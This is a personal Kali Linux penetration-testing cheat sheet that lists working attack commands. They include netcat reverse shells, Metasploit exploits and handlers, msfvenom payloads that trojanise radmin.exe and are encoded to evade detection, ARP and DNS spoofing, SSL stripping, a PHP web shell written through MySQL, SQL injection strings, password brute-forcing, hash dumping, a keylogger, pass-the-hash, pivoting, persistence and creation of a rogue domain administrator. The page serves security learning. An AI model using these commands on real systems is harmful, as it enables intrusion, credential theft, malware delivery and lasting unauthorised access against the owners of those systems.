Progmar Marcin Załęczny

Language:

Networking commands and penetration testing in Kali Linux

Applications to download:


Nessus - security scanner
    http://www.tenable.com/products/nessus-home
Running application daemon: /etc/init.d/nessusd start Configuration: https://kali:8834/ After first application's startup it displays an interface for creating user to log to the application. Next it displays a form for input activation key which is sent to the email submitted during registration process on the producer's webpage.
Next application makes its initialization, downloads signature database and configures the signatures. This process can take long amount of time and uses average 100% of CPU's time, so be prepared to wait quite a long.
I started the process in the late evening just before going asleep and when i woke up in the morning the application was ready for working.

mingw-w64 - provides 64-bit Windows programmes compilation in Linux environment:
Make sure that in /etc/apt/sources.list config file are available following repositories: # Regular repositories
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free
# Source repositories
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
If not then paste them in and install application with following commands: apt-get clean
apt-get update
apt-get upgrade
apt-get install mingw-w64


Tests if specified port (5500) is opened on the remote machine: nc -v 192.168.10.1 5500

Tests if sending FIN packet to closed port not results in receiving RST/ACK packet: sudo nmap -sF

Tests if sending ACK packet which is not part of established session will not cause receiving response: sudo nmap -sA

Tests if specified UDP port (5500) is opened on the remote machine: sudo hping3 -2 -p 5500 192.168.8.100

Tests if sending icmp echo response for an icmp echo request that was not sent by a remote machine will not cause receiving response: sudo hping3 -1 --icmptype echo-reply 192.168.8.100

Sends one icmp echo packet to a remote host: ping -c 1 192.168.8.100

Sends an icmp echo packet without data after its header to a remote host: sudo nmap -sP 192.168.8.100 or: ping -s 0 192.168.8.100

Broadcast addresses: 224.0.0.0 - 239.255.255.255

TCP connect scanning of a specified machine (root privileges are not required): nmap -P0 -sT 192.168.8.100 or: nmap -sT -n 192.168.8.100 --max-rtt-timeout 500ms

TCP SYN scanning of a specified machine: sudo nmap -P0 -sS 192.168.8.100 or (without option specifying scanning type, because TCP SYN scanning is a default one): sudo nmap -n 192.168.8.100 --max-rtt-timeout 500ms

TCP FIN scanning of a specified machine: sudo nmap -P0 -sF 192.168.8.100

TCP XMAS scanning of a specified machine: sudo nmap -P0 -sX 192.168.8.100

TCP NULL scanning of a specified machine: sudo nmap -P0 -sN 192.168.8.100

TCP ACK scanning of a specified machine: sudo nmap -P0 -sA 192.168.8.100

Scans UDP ports of a specified machine: sudo nmap -P0 -sU 192.168.8.100 or: sudo nmap -sU -n 192.168.8.100 --max-rtt-timeout 500ms

Scans specified network for opened SSH port: sudo nmap -P0 -p 22 -sS 192.168.8.0/24

Detects a service version listening on a specified common port (80): sudo nmap -sV -P0 -p 80 -n 192.168.8.100

TCP SYN scanning of a specified machine (192.168.8.100) with 10.0.0.1 address as a source address using eth0 interface: sudo nmap -P0 -sS -S 10.0.0.1 -e eth0 192.168.8.100

Runs netcat as a TCP server listening on port 5001. The program is awaiting for data sent by network and after receiving it dumps it on the standard output and closes down: nc -l 5001

Runs netcat as a UDP server listening on port 5002. The program is awaiting for data sent by network and after receiving it dumps it on the standard output and closes down: nc -u -l 5002

Sends a text specified after echo command to the TCP server listening on the port 5001 on the specified remote machine using nc (netcat) program: echo "To jest napis 12345" | nc 192.168.8.100 5001

Sends 10 bytes of 0xa5 to the UDP server listening on the port 5002 on the specified remote machine using nc (netcat) program: perl -e 'print "\xa5"x10' | nc -u 192.168.8.100 5002

Restarts networking service (ex. after changes made in /etc/network/interfaces file) service networking restart

Runs netcat application in server mode listening on port 1234: nc -lvtp 1234

Sends data to server listening on 1234 port on 127.0.0.1 (localhost) machine: nc -vt 127.0.0.1 1234

Runs netcat as a server listening on 1234 port. Every incoming line of text is processed by shell /bin/sh and the result is send back to the client: nc -lvtp 1234 -e /bin/sh

Runs netcat as a client connecting with server listening on port 1234 of localmachine and provides to the server possibility of executing client's shell commands and obtaining results of that commands: nc -vt 127.0.01 1234 -e /bin/sh

Metasploit in Kali 2

Runs postgresql server service: systemctl start postgresql

Initializes database for metasploit: msfdb init

Runs metasploit console: msfconsole

Searches metasploit's database for exploit that takes advantage of vulnerability with specified code-number (ms08-067): msf> search ms08-067

Displays specified exploit's details: msf> info exploit/windows/smb/ms08_067_netapi

Switches metasploit console context to the specified exploit's module: msf> use windows/smb/ms08_067_netapi

Displays options necessary for running selected module/exploit: msf exploit(ms08_067_netapi)> show options

Sets value of specified option (here RHOST): msf exploit(ms08_067_netapi)> set RHOST 192.168.10.100

Displays operating systems that are vulnerable for the selected module/exploit: msf exploit(ms08_067_netapi)> show targets

Sets target operating system (the number is taken from the list generated by the "show targets" command): msf exploit(ms08_067_netapi)> set target numer

Displays payloads that are compatible with selected module/exploit: msf exploit(ms08_067_netapi)> show payloads

Runs selected exploit: exploit

Exits the meterpreter shell that was ran after successful break in to the victim system: meterpreter> exit

Selects payload of type reverse shell for the module/exploit: msf exploit(ms08_067_netapi)> set payload windows/shell_reverse_tcp

Exits msfconsole console: msf exploit(ms08_067_netapi)> exit

Program that generates payloads for Metasploit: msfvenom -h

Displays available payloads list: msfvenom -l payloads

Displays options available for selected payload (windows/meterpreter/reverse_tcp): msfvenom -p windows/meterpreter/reverse_tcp --payload-options

Displays available payload formats: msfvenom --help-formats

Generates payload.exe executable that runs meterpreter shell connecting with specified host on specified port: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.101 LPORT=443 --platform windows --arch x86 -f exe >payload.exe

Generates program which handles connections incoming from the victim's systems that executed payload.exe file generated above: msfconsole
msf> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.10.101
msf exploit(handler)> set LPORT 443
msf exploit(handler)> exploit
The last line of snippet above creates process listening on 443 port.

Uses auxiliary scanner/smb/pipe_auditor module to display list of streams that listen on SMB server on remote machine: msf> use scanner/smb/pipe_auditor
msf auxiliary(pipe_auditor)> set RHOSTS 192.168.10.100
msf auxiliary(pipe_auditor)> exploit

Shell command that updates modules/exploits Metasploit's database: msfupdate

Displays all scripts (in /usr/share/nmap/scripts directory) belonging to 'default' category: nmap --sript-help default

Displays details on specified script (here nfs-ls): nmap --sript-help nfs-ls

Scans specified host to reveal opened ports and runs all scripts belonging to 'default' category on each of ports found: nmap -sC 192.168.10.100 or (counterpart): nmap --script=default 192.168.10.100

Scans specified host to reveal opened ports and runs specified (nfs-ls) script on each of ports found: nmap --script=nfs-ls 192.168.10.100

Runs Metasploit console ang checks if on specified hosts (192.168.10.100-192.168.10.110 i 192.168.56.1) is listening ftp service and if it allows for anonymous access: msfconsole
msf> use scanner/ftp/anonymous
msf> set RHOSTS 192.168.10.100-110 192.168.56.1
msf> exploit

Checks if specified host is vulnerable for selected exploit without running the one: msfconsole
msf> use windows/smb/ms08_067_netapi
msf> set RHOST 192.168.10.100
msf> check

Checks website on specified host for known vulnerabilities: nikto -h 192.168.10.100

Attempts to log in to the WebDAV panel on specified host using default credentials: cadaver http://192.168.10.100/wedav Sends to the remote machine text.txt file: dav:/webdav/> put test.txt

Checks mail server if specified user exists: nc 192.168.10.100 25
VRFY username
^D

Turns on ip packets forwarding on current machine (ex. 192.168.10.101) and poisons arp cache of 192.168.10.100 host to make it think that 192.168.10.101 is now 192.168.10.110: echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.10.100 192.168.10.110
Now do the trick for 192.168.10.110 to make it think that 192.168.10.101 is 192.168.10.100 (from now 192.168.10.101 forwards packets between 192.168.10.100 <=> 192.168.10.110): arpspoof -i eth0 -t 192.168.10.110 192.168.10.100

Translates specified domain address to IP address: nslookup www.google.pl

Poisons DNS with dnsspoof command: cat hosts.txt
192.168.10.101 www.google.pl
dnsspoof -i eth1 -f hosts.txt

Catches all network traffic between 192.168.10.1 gateway and 192.168.10.110 host: ettercap -Ti eth0 -M arp:remote /192.168.10.1/ /192.168.10.110/

Carry SSL Stripping attack out:

  1. Run arpspoofing between victim host and default gateway
  2. iptables -t nat -A PREROUTING -p tcp-destination-port 80 -j REDIRECT -to-port8080
  3. Issue sslstrip command: sslstrip -l 8080

Generates php script that opens meterpreter shell after visiting webpage containing the script. The script opens no extra window and connects to the specified host (192.168.56.101) on specified port number (2323): msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=2323 -f raw >meterpreter.php Runs listening process to catch connections from script described above: msfconsole
msf> use multi/handler
msf> set payload php/meterpreter/reverse_tcp
msf> set LHOST 192.168.56.101
msf> set LPORT 2323
msf> exploit
After connection made we can query for current username: meterpreter> getuid Also we can dump password hashes of the victim windows system: meterpreter> hashdump

Make mysql to write arbitrary script onto the victim machine: SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php"

Searching Metasploit's module/exploits database for specified system: msf> search drupal

Obtaining information about specified module/exploit: msf> info unix/webapp/php_xmlrpc_eval

Searches specified website (progmar.net.pl) and all sublinked websites with max 1-level nesting for minimum 5-length words and saves them to passwords.txt file: cewl -w passwords.txt -d 1 -m 5 progmar.net.pl

Generates 7- and 8-length password dictionary. Each entry consists of A or B letters: crunch 7 8 AB

Guesses users and their passwords on specified POP3 server: hydra -L userlist.txt -P passwords.txt 192.168.56.1 pop3

Guesses password of user mzaleczny on specified POP3 server: hydra -l mzaleczny -P passwords.txt 192.168.56.1 pop3

In Windows operating system in c:\windows\repair directory exists following files:
sam - contains encrypted user names and hashes of their passwords
system - contains system key used to encrypt data in file above.
Actual/Production versions of files above sit in c:\windows\system32\config directory. To extract user names and their passwords run following ommands: bkhive system xpkey.txt
samdump2 sam xpkey.txt
The result of commands above (or result of command "meterpreter> hashdump" described above) save to a file "ntpasswords.txt" and issue following command to guess passwords: john ntpasswords.txt

John program can be used to guess linux user's passwords: john linux_passwords.txt -wordlist dictionary.txt

Metasploit AllPorts payload is used to make a connection on first port number that is not filtered by a firewall. To do this there are checked all ports starting from 1: msf exploit(ms08_067_netapi)> set payload windows/shell/reverse_tcp_allports
msf exploit(ms08_067_netapi)> show options
msf exploit(ms08_067_netapi)> exploit

Aurora exploit uses IE vulnerability to make a connection with a remote system and gain access to the system shell: msf> use explit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora)> show options
msf exploit(ms10_002_aurora)> set SRVHOST 192.168.1.101
msf exploit(ms10_002_aurora)> set SRVPORT 80
msf exploit(ms10_002_aurora)> set URIPATH aurora
msf exploit(ms10_002_aurora)> set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora)> set LHOST 192.168.1.101
msf exploit(ms10_002_aurora)> exploit
Now when victim visits http://192.168.1.101/aurora address in his IE browser, the exploit will be fired and attacker owning 192.168.1.101 host will gain access to victim's OS shell.

Connects to specified session: msf exploit(ms10_002_aurora)> sessions -i SESSION_ID

Displays jobs running in background in Metasploit's console: msf exploit(ms10_002_aurora)> jobs

Kills a job of specified ID in Metasploit's console: msf exploit(ms10_002_aurora)> kill JOB_ID

Displays advanced parameters for selected module/exploit: msf exploit(ms10_002_aurora)> show advanced

Make migrate.rb script with parameter -f to be automatically executed after successful connection with victim host. It moves Meterpreter shell into newly started notepad process in the host (thanks to it we do not lose the connection after closing up hanged IE): msf exploit(ms10_002_aurora)> set AutoRunScript migrate -f
msf exploit(ms10_002_aurora)> exploit
Alternatively we can set advanced parameter "PrependMigrate" to true. It will do shell migration into newly created process yet before exploit fire.

Prepare malicious pdf and listening for callback connections: msf> use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf)> show options
msf exploit(adobe_utilprintf)> exploit
msf exploit(adobe_utilprintf)> cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf)> systemctl start apache2
Catching connections from victim hosts: msf exploit(adobe_utilprintf)> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.1.101
msf exploit(handler)> set ExitOnSession false
We run our handler as a background process: msf exploit(handler)> exploit -j

Exploit for web browser with Java < 7 Update 11: msf> use exploit/multi/browser/java_jre17_jmxbean
msf exploit(java_jre17_jmxbean)> set SRVHOST 192.168.1.101
msf exploit(java_jre17_jmxbean)> set SRVPORT 80
msf exploit(java_jre17_jmxbean)> set URIPATH javaexploit
msf exploit(java_jre17_jmxbean)> set payload java/meterpreter/reverse_http
msf exploit(java_jre17_jmxbean)> set LHOST 192.168.1.101
msf exploit(java_jre17_jmxbean)> exploit

Applet exploit for web browser with Java: msf> use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet)> set APPLETNAME CustomAppletName
msf exploit(java_signed_applet)> set SRVHOST 192.168.1.101
msf exploit(java_signed_applet)> set SRVPORT 80
msf exploit(java_signed_applet)> set URIPATH javaappletexploit
msf exploit(java_signed_applet)> set target 0
msf exploit(java_signed_applet)> set payload java/meterpreter/reverse_tcp
msf exploit(java_signed_applet)> set LHOST 192.168.1.101
msf exploit(java_signed_applet)> exploit

Module recognizing web browser and applying all available exploits that might be successfull: msf> use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn)> set LHOST 192.168.1.101
msf auxiliary(browser_autopwn)> set URIPATH autopwn
msf auxiliary(browser_autopwn)> exploit
Displays all sessions with active shell running at victim computers: msf auxiliary(browser_autopwn)> sessions -l

Program fo making social enginering attacks (sending malicious code in attachments to e-mails, creating phishing webpages, etc. - it is installed in Kali Linux by default): setoolkit

In Kali Linux in /usr/share/windows-binaries directory there are stored a few executables that can be used to hold malicious payloads (it may be also any other windows exe binaries). Here is how to prepare a trojan: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -x /usr/share/windows-binaries/radmin.exe -k -f exe > radmin.exe Process listening for incoming connections from meterpreter shells, we run in Metasploit console by using handler module: msfconsole
msf> use multi/handler
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf exploit(handler)> set LHOST 192.168.1.101
msf exploit(handler)> set LPORT 4444
msf exploit(handler)> exploit

Command working as above but it it also runs 10 iterations of payload ciphering with x86/shikata_ga_nai encoder: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -x /usr/share/windows-binaries/radmin.exe -e x86/shikata_ga_nai -i 10 -k -f exe >radmin_coded.exe

Displays list of encoders supperted by msfvenom program: msfvenom -l encoders

Multiple ciphering a payload with some different encoders: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f raw >radmin_coded.bin
msfvenom -p - -x /usr/share/windows-binaries/radmin.exe -k -f exe -a x86 --platform windows -e x86/bloxor -i 2 >radmin_coded2.exe <radmin_coded.bin

Generates a payload as a text string in C language: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f c >radmin.c

Generates random text string of 512 length: cat /dev/urandom | tr -dc A-Z-a-z-0-9 | head -c512

Ciphers input.exe executable with hyperion.exe program and saves it to output.exe executable: wine hyperion.exe input.exe output.exe

Installs and runs a tftpd server in Kali Linux: apt-get install atftpd
systemctl start atftpd
Downloads plik.txt file from remote server to windows machine running cmd shell: tftp -i 192.168.1.101 GET plik.txt Pobieranie pliku z maszyny z windowsem za pomocą powłoki cmd: Uploads plik.txt file from windows machine running cmd shell to remote server: tftp -i 192.168.1.101 PUT plik.txt

Meterpreter scripts reside in /usr/share/metasploit-framework/scripts/meterpreter directory. To run a script issue following command: meterpreter> run script-name A script help you can obtain as below: meterpreter> run script-name -h

Displays a running in processes list: meterpreter> ps

Moves a meterpreter session into a process with id 1234: meterpreter> run migrate -p 1234

Moves a meterpreter session to run as a background job: meterpreter> background

Obtains logged users list of specified session in the system: msf> use post/windows/gather/enum_logged_on_users
msf post(enum_logged_on_users)> set SESSION 1
msf post(enum_logged_on_users)> exploit

Calling any WinAPI function for example to check if current user is an admin: msf> sessions -i 1
meterpreter> irb
>> client.railgun.shell32.IsUserAdmin
>> exit

Runs a bucket of exploits until to get user with SYSTEM privileges or to exhaust exploits: meterpreter> getsystem
meterpreter> getuid

Returns to previous user privileges: meterpreter> rev2self

Runs exploit for Windows XP SP2/SP3 system to leverage user privileges: msf> use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf)> set SESSION 1
msf exploit(ms11_080_afdjoinleaf)> set payload windows/meterpreter/reverse_tcp
msf exploit(ms11_080_afdjoinleaf)> set LHOST 192.168.1.101
msf exploit(ms11_080_afdjoinleaf)> exploit

Bypasses UAC (User Account Control) in Windows 7: msf> use exploit/windows/local/bypassuac
msf exploit(bypassuac)> set SESSIoN 1
msf exploit(bypassuac)> exploit
meterpreter> getuid
The commands above open meterpreter session with UAC disabled so the command below should work properly: meterpreter> getsystem

Enters to Linux shell within the meterpreter session (of course the Linux system should work on compromised machine): meterpreter> shell And issuing some basic commands: > whoami
> uname -a
> lsb_release -a
> udevadm --version

Searches local exploits database for udev program: /usr/share/exploitdb/searchsploit udev

Runs nc as a server listening on 12345 port: nc -lvp 12345 Connects to netcat working as above and attaches shell as a program handling standard input: nc 127.0.0.1 12345 -e /bin/bash From now within the first of the couple commands above you can issue linux shell commands that will be executed remotely:

Searches for files containing phrase password in their names from within meterpreter session: meterpreter> search -f password

Runs embedded in meterpreter key-logger: meterpreter> keyscan_start Displays catched keypresses: meterpreter> keyscan_dump Stops key-logger: meterpreter> keyscan_stop

Catching passwords stored by WinSCP application in Windows system: msf> use post/windows/gather/credentials/winscp
msf post(winscp)> set session 1
msf post(winscp)> exploit

Displays list of users in Windows system: cmd c:\> net users

Displays list of local admins in Windows system: cmd c:\> net localgroup Administrators

After intercepting one Windows host you can try to intercept other hosts in the domain by using psexec exploit: msf> use exploit/windows/smb/psexec
msf exploit(psexec)> set RHOST 192.168.1.102
msf exploit(psexec)> set SMBUser username
msf exploit(psexec)> set SMBPass userpassword
msf exploit(psexec)> set SMBDomain GRUPA_ROBOCZA
msf exploit(psexec)> exploit

Uses psexec module/exploit to log into a remote host knowing only hash of real password: msf exploit(psexec)> set SMBPass password_LM_or_NTLM_hash
msf exploit(psexec)> exploit

Runs sshexec module/exploit to log into a remote Linux host: msf> use exploit/multi/ssh/sshexec
msf exploit(sshexec)> set RHOST 192.168.1.102
msf exploit(sshexec)> set USERNAME user_name
msf exploit(sshexec)> set PASSWORD my_password
msf exploit(sshexec)> set payload linux/x86/meterpreter/reverse_tcp
msf exploit(sshexec)> set LHOST 192.168.1.101
msf exploit(sshexec)> exploit
meterpreter> getuid
meterpreter> shell
> whoami

Loads incognito module to handle tokens in Windows system: msf> load incognito Lists in meterpreter shell list of available tokens: meterpreter> list_tokens -u Obtains specified user's privileges (associated to given 'COMPXP\\username' token): meterpreter> impersonate_token COMPXP\\username

Starts smb server in Windows domain environment that listens at 445 port and saves user password hashes to the /root/johnpwfile file: msf> use auxiliary/server/capture/smb
msf auxiliary(smb)> set JOHNPWFILE /root/johnpwfile
msf auxiliary(smb)> exploit
Next you can initiate smb connections with 192.168.1.100 fake host from within compromised machine: meterpreter> shell
C:\windows\system32> net use \\192.168.1.100\anything

Displays network configuration of host running meterpreter shell: meterpreter> ifconfig

Redirects all network traffic to 192.168.80.0/24 network through session number 2 (that has connection with catched router in the same network) - it is so called pivot: msf> route add 192.168.80.0 255.255.255.0 2

Scans ports from within Metasploit shell: msf> use scanner/portscan/tcp
msf auxiliary(tcp)> set RHOST 192.168.1.101
msf auxiliary(tcp)> exploit

Runs in Metasploit socks4a proxy server: msf> use auxilary/server/socks4a
msf auxiliary(socks4a)> set SRVPORT 4040
msf auxiliary(socks4a)> exploit
Now in /etc/proxychains.conf file change line: socks4 127.0.0.1 9050 to: socks4 127.0.0.1 4040 From now you can run through the pivot network programmes outside the Metasploit by using proxychains application, ex: root@kali:~# proxychains nmap -Pn -sT -sV -p 21,22,25,80,445

Creates new user (martin) and assigns it to the domain in domain environment: C:\> net use martin mypassword /add /domain Assigns user created above to the Administrators group: C:\> net localgroup Administrators martin /add

Creates in catched Windows system VisualBasic script that is executed after each system start and is trying to connect to attacker's host every 10 minutes: meterpreter> run persistence -r 192.168.1.100 -p 12345 -X -i 600

Runs burpsuite application: Applications -> Web Applications Analysis -> burpsuite Server proxy configuration in Firefox: Menu Edit -> Preferences -> Advanced There you switch to "Network" tab and click "Settings" button. Server proxy configuration window should be opened.

Example of injecting arbitrary code using variables processed by webapplications: http://someapp.pl/login.php?username=' OR '1'='1&password=' OR '1'='1
http://someapp.pl/item.php?id=4 or 1 in (show databases)

Automated extracting information about a database: sqlmap -u "http://someapp.pl/item.php?id=4" --dump

Attempt to obtain access to shell in that there is running SQL Server: sqlmap -u "http://someapp.pl/item.aspx?id=4" --os-shell The method uses SQL Server xp_cmdshell command.

All Metasploit's exploits reside in following directory: /usr/share/metasploit-framework/modules/exploits